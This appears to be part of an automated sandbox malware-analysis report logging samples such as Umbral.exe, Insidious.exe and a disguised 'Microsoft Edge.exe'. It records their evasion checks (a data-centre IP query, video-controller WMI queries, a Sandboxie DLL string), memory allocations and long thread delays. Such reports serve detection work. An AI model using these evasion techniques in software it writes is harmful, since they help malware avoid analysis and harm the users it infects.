                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: Nursultan.exe, 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Microsoft Edge.exe, 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.3.dr, Microsoft Edge.exe.0.drBinary or memory string: SBIEDLL.DLL
                            Source: C:\Users\user\Desktop\Nursultan.exeMemory allocated: ED0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeMemory allocated: 1A890000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 1AB70000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 1AEE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 1AF40000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 1AF30000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: B20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 1A900000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 24510C00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 2452A650000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: AF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 1A5B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 740000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 1A400000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 1DCB43B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 1DCCDDE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 2ACCE6A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 2ACE81C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 7A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 1A560000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 12A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 1ACA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 22382370000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 2239BCE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 17D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 1CFADC90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 1CFC5D30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 1390000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 1AD60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 2E6878C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 2E6A1370000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: E20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 1AAB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 11F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 1AE40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 220C7960000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeMemory allocated: 220E14C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: B90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 2870000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeMemory allocated: 1AA70000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: E00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeMemory allocated: 1A760000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 232B82E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 232D1D70000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Nursultan.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599874
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599765
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599619
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599501
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599377
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 599075
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598937
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598703
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598453
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598150
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 598030
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597918
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597773
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597652
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597546
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597437
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597325
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597218
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 597104
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596988
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596861
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596734
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 596624
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 599079
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598930
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598766
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598599
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598352
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598230
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 598122
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597987
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597868
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597747
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597596
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597343
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597229
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 597110
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596983
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596872
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596756
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596594
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596375
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596183
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 596031
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595874
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595605
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595447
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595226
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 595100
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594958
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594782
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594641
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594487
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594358
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594232
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 594094
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593981
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593869
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593765
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593648
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593527
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593375
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593227
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 593090
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592891
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592532
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592360
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592204
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 592047
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591907
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591750
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591621
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591475
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591356
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 591125
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590903
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590795
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590688
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590563
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590449
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590325
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 590188
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589985
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589860
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589610
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589340
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589232
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589125
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 589007
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588891
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588766
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588641
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588492
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588391
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588266
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 588147
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587969
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587532
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587396
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587261
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587151
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 587044
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586912
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586782
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586645
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586527
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586422
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 586309
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWindow / User API: threadDelayed 6533Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWindow / User API: threadDelayed 3175Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6114
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3314
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWindow / User API: threadDelayed 1341
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWindow / User API: threadDelayed 1350
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeWindow / User API: threadDelayed 8304
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeWindow / User API: threadDelayed 1302
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6566
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 596
                            Source: C:\Users\user\Desktop\Nursultan.exe TID: 6576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 4416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7636Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 1088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 6468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -8301034833169293s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 1852Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -10145709240540247s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -599874s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -599765s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -599619s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -599501s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -599377s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -599075s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -598937s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -598703s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -598453s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -598150s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -598030s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296Thread sleep time: -597918s >= -30000s
